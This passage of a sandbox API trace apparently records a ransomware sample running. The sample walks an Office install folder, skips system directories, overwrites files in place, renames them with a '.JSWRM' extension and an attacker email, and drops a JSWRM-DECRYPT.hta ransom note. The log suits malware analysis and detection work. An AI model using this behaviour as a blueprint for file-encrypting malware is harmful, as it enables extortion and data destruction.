(lpString1="C2R64.dll", lpString2=".") returned 1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="..") returned 1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="...") returned 1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="windows") returned -1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="recovery") returned -1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="perflogs") returned -1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="documents and settings") returned -1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="system volume information") returned -1 [0129.197] lstrcmpiW (lpString1="C2R64.dll", lpString2="msocache") returned -1 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2R64.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2R64.dll", lpUsedDefaultChar=0x0) returned 9 [0129.198] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc2f507b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2f507b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc31d8fc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xaf4258, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CHART.DLL", cAlternateFileName="")) returned 1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2=".") returned 1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="..") returned 1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="...") returned 1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="windows") returned -1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="recovery") returned -1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="perflogs") returned -1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="documents and settings") returned -1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="system volume information") returned -1 [0129.198] lstrcmpiW (lpString1="CHART.DLL", lpString2="msocache") returned -1 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.198] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe206bc31, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef8a36d6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef8a36d6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x76658, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CLVIEW.EXE", cAlternateFileName="")) returned 1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2=".") returned 1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="..") returned 1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="...") returned 1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="windows") returned -1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="recovery") returned -1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="perflogs") returned -1 [0129.198] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="documents and settings") returned -1 [0129.199] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="$RECYCLE.BIN") returned 1 [0129.199] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="system volume information") returned -1 [0129.199] lstrcmpiW (lpString1="CLVIEW.EXE", lpString2="msocache") returned -1 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVIEW.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVIEW.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLVIEW.EXE", lpUsedDefaultChar=0x0) returned 10 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVIEW.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVIEW.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLVIEW.EXE", lpUsedDefaultChar=0x0) returned 10 [0129.199] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1754c10, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe1754c10, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee3545e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36e40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CNFNOT32.EXE", cAlternateFileName="")) returned 1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2=".") returned 1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="..") returned 1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="...") returned 1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="windows") returned -1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="recovery") returned -1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="perflogs") returned -1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="documents and settings") returned -1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="$RECYCLE.BIN") returned 1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="system volume information") returned -1 [0129.199] lstrcmpiW (lpString1="CNFNOT32.EXE", lpString2="msocache") returned -1 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT32.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT32.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT32.EXE", lpUsedDefaultChar=0x0) returned 12 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT32.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CNFNOT32.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CNFNOT32.EXE", lpUsedDefaultChar=0x0) returned 12 [0129.199] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71c89, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CommunicatorContentBinApp.xap", cAlternateFileName="COMMUN~1.XAP")) returned 1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2=".") returned 1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="..") returned 1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="...") returned 1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="windows") returned -1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="recovery") returned -1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="perflogs") returned -1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="documents and settings") returned -1 [0129.199] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="$RECYCLE.BIN") returned 1 [0129.200] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="system volume information") returned -1 [0129.200] lstrcmpiW (lpString1="CommunicatorContentBinApp.xap", lpString2="msocache") returned -1 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommunicatorContentBinApp.xap", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommunicatorContentBinApp.xap", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommunicatorContentBinApp.xap", lpUsedDefaultChar=0x0) returned 29 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommunicatorContentBinApp.xap", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommunicatorContentBinApp.xap", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommunicatorContentBinApp.xap", lpUsedDefaultChar=0x0) returned 29 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CommunicatorContentBinApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\communicatorcontentbinapp.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.200] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=466057) returned 1 [0129.200] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.201] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0129.216] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.216] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0129.216] CloseHandle (hObject=0x45c) returned 1 [0129.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CommunicatorContentBinApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\communicatorcontentbinapp.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CommunicatorContentBinApp.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\communicatorcontentbinapp.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.217] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8351d7a8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2=".") returned 1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="..") returned 1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="...") returned 1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="windows") returned -1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="recovery") returned -1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="perflogs") returned -1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="documents and settings") returned -1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="system volume information") returned -1 [0129.217] lstrcmpiW (lpString1="concrt140.dll", lpString2="msocache") returned -1 [0129.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0129.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="concrt140.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="concrt140.dll", lpUsedDefaultChar=0x0) returned 13 [0129.218] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Configuration", cAlternateFileName="CONFIG~1")) returned 1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2=".") returned 1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="..") returned 1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="...") returned 1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="windows") returned -1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="recovery") returned -1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="perflogs") returned -1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="documents and settings") returned -1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="$RECYCLE.BIN") returned 1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="system volume information") returned -1 [0129.218] lstrcmpiW (lpString1="Configuration", lpString2="msocache") returned -1 [0129.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\jswrm-decrypt.hta")) returned 0xffffffff [0129.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.223] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.223] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0129.224] CloseHandle (hObject=0x45c) returned 1 [0129.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\jswrm-decrypt.hta")) returned 0x20 [0129.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x43aed959, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0129.226] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.226] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x43aed959, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0129.226] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.226] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.226] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1774e9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x438, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="card_expiration_terms_dict.txt", cAlternateFileName="CARD_E~1.TXT")) returned 1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2=".") returned 1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="..") returned 1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="...") returned 1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="windows") returned -1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="recovery") returned -1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="perflogs") returned -1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="documents and settings") returned -1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="$RECYCLE.BIN") returned 1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="system volume information") returned -1 [0129.226] lstrcmpiW (lpString1="card_expiration_terms_dict.txt", lpString2="msocache") returned -1 [0129.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_expiration_terms_dict.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0129.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_expiration_terms_dict.txt", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_expiration_terms_dict.txt", lpUsedDefaultChar=0x0) returned 30 [0129.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_expiration_terms_dict.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0129.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_expiration_terms_dict.txt", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_expiration_terms_dict.txt", lpUsedDefaultChar=0x0) returned 30 [0129.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_expiration_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_expiration_terms_dict.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.227] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1080) returned 1 [0129.227] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.227] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x430, lpOverlapped=0x0) returned 1 [0129.229] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.229] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x430, lpOverlapped=0x0) returned 1 [0129.229] CloseHandle (hObject=0x238) returned 1 [0129.229] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_expiration_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_expiration_terms_dict.txt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_expiration_terms_dict.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 